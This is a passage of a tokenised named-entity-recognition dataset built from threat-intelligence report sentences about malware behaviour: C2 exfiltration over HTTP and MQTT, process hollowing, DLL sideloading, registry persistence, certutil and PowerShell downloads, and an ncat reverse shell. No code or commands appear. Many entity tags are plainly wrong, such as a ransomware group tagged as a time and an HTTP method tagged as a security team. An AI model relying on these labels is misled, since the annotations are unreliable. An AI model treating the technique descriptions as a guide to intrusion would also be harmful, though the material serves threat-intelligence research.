"O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lateral", - "tool", - "transfers", - "have", - "been", - "used", - "to", - "move", - "tools", - "and", - "files", - "from", - "one", - "compromised", - "system", - "to", - "another,", - "including", - "SMB", - "and", - "RDP." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "to", - "exfiltrate", - "data", - "to", - "external", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "exfiltrate", - "data", - "directly", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tools", - "such", - "as", - "SystemBC", - "and", - "proprietary", - "backdoors", - "are", - "known", - "to", - "be", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Legitimate", - "processes", - "have", - "been", - "corrupted", - "by", - "Vice", - "Society", - "via", - "code", - "injection,", - "as", - "a", - "means", - "to", - "evade", - "defenses." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "is", - "designed", - "to", - "steal", - "sensitive", - "information", - "from", - "victims'", - "systems," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attackers", - "used", - "an", - "innocent-looking", - "email", - "to", - "lure", - "victims", - "into", - "opening", - "an", - "attachment." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "found", - "the", - "original", - "email", - "that", - "included", - "a", - "ZIP", - "file", - "attached,", - "which", - "contained", - "an", - "ISO", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sample", - "uses", - "obfuscation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "file", - "is", - "an", - "obfuscated", - ".NET", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "only", - "uses", - "one", - "code", - "obfuscation", - "technique:", - "API", - "hashing." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Payload", - "Obfuscation" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "each", - "data", - "byte", - "in", - "the", - "HTTP", - "based", - "C2", - "communication," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "submitted", - "to", - "the", - "C2", - "server", - "through", - "HTTP", - "protocol", - "using", - "the", - "POST", - "method." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "HTTP", - "C2", - "Communication", - "section." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "C2", - "Communication" - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "to", - "the", - "C2", - "through", - "the", - "HTTP", - "protocol." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "can", - "be", - "found", - "in", - "the", - "two", - "bytes", - "of", - "the", - "HTTP", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "shows", - "a", - "HTTP", - "POST", - "request", - "and", - "its", - "corresponding", - "message", - "body." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Content-Key,", - "which", - "is", - "a", - "custom", - "HTTP", - "header", - "whose", - "value", - "corresponds", - "to", - "a", - "hash", - "generated", - "out", - "of", - "the", - "HTTP", - "header." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "POST", - "request", - "(type", - "27", - "/", - "data", - "exfiltration)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "uploads", - "this", - "information", - "to", - "an", - "attacker-controlled", - "machine", - "via", - "HTTP", - "POST." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "exfiltrates", - "information", - "to", - "the", - "C2", - "through", - "the", - "HTTP", - "protocol." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "HTTP", - "POST", - "request", - "(type", - "27", - "/", - "data", - "exfiltration)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "ISO", - "file", - "opener", - "that", - "mounts", - "and", - "opens", - "the", - "file", - "with", - "a", - "simple", - "double-click." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "the", - "victim,", - "the", - "opening", - "process", - "simply", - "looks", - "like", - "a", - "regular", - "directory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - ".NET", - "file", - "using", - "process", - "hollowing,", - "which", - "is", - "a", - "code", - "injection", - "technique", - "in", - "which", - "an", - "attacker", - "removes", - "legitimate", - "code", - "from", - "an", - "executable", - "and", - "replaces", - "it", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "process", - "hollowing", - "was", - "used", - "to", - "inject", - "a", - "malicious", - "PE", - "file", - "into", - "the", - "legitimate", - "process", - "called", - "aspnet_compiler.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "use", - "this", - "technique", - "to", - "retrieve", - "export", - "functions", - "from", - "loaded", - "libraries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "corresponding", - "APIs", - "in", - "the", - "appropriate", - "library." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "the", - "MoveFileExW", - "or", - "CopyFileW", - "Windows", - "API." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Then,", - "it", - "creates", - "and", - "sets", - "a", - "new", - "value", - "for", - "the", - "registry", - "key", - "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "In", - "order", - "to", - "establish", - "persistence", - "on", - "the", - "targeted", - "host,", - "the", - "malware", - "starts", - "by", - "saving", - "a", - "copy", - "of", - "itself", - "in", - "a", - "new", - "folder", - "in", - "the", - "%APPDATA%", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "searches", - "for", - "and", - "exfiltrates", - "the", - "following", - "information:", - "OS", - "architecture", - "Built-in", - "admin", - "Domain", - "host", - "name", - "Hostname", - "Local", - "admin", - "Operating", - "system", - "Screen", - "resolution" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Username", - "information" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Exfiltrate", - "keylogger", - "data" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Keylogger", - "database" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "use", - "additional", - "payload", - "types" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exfiltrate", - "screenshots" - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Potential", - "hidden", - "files" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "collects", - "sensitive", - "data", - "from", - "web", - "browsers," - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "functions", - "are", - "made", - "to", - "steal", - "credentials", - "from", - "different", - "types", - "of", - "applications", - "and", - "services", - "on", - "the", - "Windows", - "operating", - "system:", - "Browsers:", - "Safari,", - "Internet", - "Explorer,", - "Firefox", - "and", - "Chromium-based", - "browsers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "adopting", - "publicly", - "disclosed", - "proof-of-concept", - "(POC)", - "code", - "shortly", - "after", - "it", - "is", - "released", - "to", - "exploit", - "vulnerabilities", - "in", - "internet-facing", - "applications." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "their", - "initial", - "exploitation", - "of", - "vulnerable", - "internet-facing", - "applications," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "continues", - "to", - "use", - "older", - "vulnerabilities,", - "especially", - "Log4Shell,", - "to", - "compromise", - "unpatched", - "devices" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "gaining", - "initial", - "access", - "to", - "an", - "organization", - "by", - "exploiting", - "a", - "vulnerability", - "with", - "a", - "public", - "POC," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "as", - "several", - "adversaries", - "are", - "exploiting", - "CVE-2022-47966", - "for", - "initial", - "access.", - "Apache", - "Log4j2", - "(aka", - "Log4Shell)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enable", - "RDP", - "connections." - ], - "ner_tags": [ - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "can", - "use", - "the", - "Active", - "Directory", - "database", - "to", - "access", - "credentials", - "for", - "users’", - "accounts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "credentials", - "are", - "accessed", - "and", - "the", - "target", - "organization", - "has", - "not", - "reset", - "corresponding", - "passwords,", - "the", - "actors", - "can", - "log", - "in", - "with", - "stolen", - "credentials", - "and", - "masquerade", - "as", - "legitimate", - "users," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "could", - "also", - "gain", - "access", - "to", - "other", - "systems", - "where", - "individuals", - "may", - "have", - "reused", - "their", - "passwords." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "persist", - "in", - "target", - "environments", - "and", - "deploy", - "additional", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "backdoor", - "with", - "the", - "ability", - "to", - "download", - "and", - "run", - "additional", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "create", - "scheduled", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scheduled", - "Task", - "Creation", - "or" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remote", - "Task", - "Creation/Update", - "using", - "Schtasks", - "Process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "group", - "crafts", - "bespoke", - "phishing", - "emails,", - "often", - "purporting", - "to", - "contain", - "information", - "on", - "security", - "policies", - "that", - "affect", - "countries", - "in", - "the", - "Middle", - "East,", - "to", - "deliver", - "weaponized", - "documents", - "to", - "individuals", - "of", - "interest." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "read", - "files," - ], - "ner_tags": [ - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "gather", - "information", - "on", - "an", - "infected", - "host,", - "and", - "send", - "details", - "back", - "to", - "the", - "attackers." - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Commands", - "executed", - "by", - "WMI", - "on", - "new", - "hosts" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "script", - "to", - "deobfuscate", - "the", - "control", - "flow", - "of", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "immediately", - "decrypts", - "the", - "third", - "layer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "decrypts", - "the", - "c2", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Use", - "NtQueryInformationProcess", - "API" - ], - "ner_tags": [ - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "It", - "decrypts", - "an", - "encrypted", - "payload," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Payload", - "decryption", - "function." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "the", - "payload", - "decryption", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deobfuscated", - "code", - "of", - "GuLoader’s", - "shellcode." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "using", - "stack", - "to", - "decrypt", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "script", - "to", - "restore", - "deobfuscate", - "control", - "flow." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "control", - "flow", - "obfuscation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "shellcode’s", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "payload", - "from", - "c2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "arithmetic", - "value", - "calculations" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "control", - "flow", - "obfuscation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "control", - "flow", - "obfuscation." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Unpacking", - "of", - "GuLoader’s", - "shellcodes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "packed", - "using", - "NSIS", - "installer." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "UNPACKING", - "GULOADER’S", - "SHELLCODE" - ], - "ner_tags": [ - "B-Idus", - "B-Idus", - "B-HackOrg" - ] - }, - { - "tokens": [ - "It", - "then", - "calls", - "CallWindowProcW", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-Tool" - ] - }, - { - "tokens": [ - "Uses", - "EnumWindows", - "API" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uses", - "EnumDeviceDrivers", - "and", - "GetDeviceDriverBaseNameA", - "APIs." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Uses", - "MsiEnumProductsA", - "and", - "MsiGetProductInfoA", - "APIs." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Uses", - "OpenSCManagerA", - "and", - "EnumServicesStatusA", - "APIs." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Uses", - "NtSetInformationThread", - "API" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "DbgBreakPoint", - "and", - "DbgUiRemoteBreakin", - "API" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "it", - "starts", - "payload", - "execution", - "using", - "the", - "ZwCreateThreadEx", - "API." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Tool" - ] - }, - { - "tokens": [ - "call", - "RtlAddVectoredExceptionHandler", - "API" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "This", - "shellcode", - "has", - "complex", - "obfuscation,", - "consisting", - "of", - "junk", - "code" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "dynamic", - "API", - "resolution" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "process", - "hollowing", - "to", - "inject", - "decrypted", - "payload", - "into", - "child", - "process", - "and", - "resolves", - "its", - "Import", - "Address", - "Table." - ], - "ner_tags": [ - "O", - "B-Tool", - "B-Tool", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "sideloading," - ], - "ner_tags": [ - "B-SamFile", - "B-Features" - ] - }, - { - "tokens": [ - "program", - "first", - "sideloads", - "u2ec.dll,", - "which", - "then", - "loads", - "the", - "payload", - "file", - "usb.ini" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "malware", - "rzlog4cpp.dll", - "is", - "sideloaded" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "used", - "for", - "the", - "first", - "sideloading." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "including", - "the", - "use", - "of", - "DLL", - "sideloading" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "malicious", - "DLL", - "is", - "sideloaded,", - "it", - "will", - "drop", - "the", - "legitimate", - "EXE", - "file", - "and", - "the", - "malicious", - "DLL", - "file,", - "which", - "are", - "embedded", - "in", - "the", - "resource", - "section", - "of", - "the", - "DLL", - "file." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "First-stage", - "legitimate", - "executable", - "for", - "DLL", - "sideloading" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Second-stage", - "legitimate", - "executable", - "for", - "DLL", - "sideloading" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "files", - "have", - "XOR-encrypted", - "content", - "to", - "prevent", - "detection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "another", - "payload", - "that", - "is", - "XOR-encrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "applies", - "obfuscation", - "techniques" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reads", - "the", - "encrypted", - "configuration", - "filecan" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "logging", - "strings", - "are", - "encrypted", - "with", - "a", - "single", - "byte", - "in", - "XOR", - "operations", - "as" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "obfuscation", - "mechanisms." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "increasing", - "number", - "of", - "obfuscations", - "are", - "being", - "adopted", - "to", - "thwart", - "static", - "analysis." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "containing", - "one-byte", - "XOR", - "encrypted", - "sections" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "decrypt", - "this", - "file", - "with", - "a", - "single", - "byte", - "in", - "XOR", - "operations,", - "find", - "the", - "PE", - "header,", - "and", - "drop", - "the", - "payload", - "to", - "the", - "specified", - "path." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "after", - "decrypting", - "the", - "frData", - "member", - "in" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "will", - "then", - "decrypt", - "the", - "encrypted", - "payload", - "with", - "the", - "predefined", - "RC4", - "key" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "decryption,", - "it", - "then", - "checks", - "if", - "the", - "first", - "byte", - "of", - "the", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "this", - "is", - "decrypted," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "will", - "continue", - "to", - "read", - "and", - "decrypt", - "goopdate" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C&C", - "traffic", - "of", - "the", - "PUBLOAD", - "HTTP", - "variant" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "communicates", - "to", - "its", - "C&C", - "servers", - "over", - "the", - "MQTT", - "protocol,", - "which", - "is", - "commonly", - "used", - "in", - "internet-of-things", - "(IoT)", - "devices" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "malware", - "that", - "communicates", - "over", - "the", - "MQTT", - "protocol." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Command", - "codes", - "in", - "the", - "PUBLOAD", - "HTTP", - "variant" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "variant" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "variant" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "data", - "in", - "the", - "HTTP", - "body", - "is", - "the", - "same", - "as", - "the", - "past", - "variant," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "variant" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "supports", - "data", - "upload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "group", - "used", - "certutil.exe", - "to", - "download", - "the", - "legitimate", - "WinRAR", - "binary", - "as", - "rar1.exe", - "from", - "the", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "downloading", - "malware" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "The", - "certutil.exe", - "program", - "downloads", - "the", - "WinRAR", - "binary" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "used", - "PowerShell", - "to", - "download", - "multiple", - "malware", - "and", - "archives", - "from", - "the", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "command", - "execution." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "shell", - "open", - "command." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "create", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "will", - "then", - "create", - "a", - "reverse", - "shell", - "via", - "ncat.exe", - "to", - "the", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "backdoor", - "that", - "is", - "capable", - "of", - "executing", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "including", - 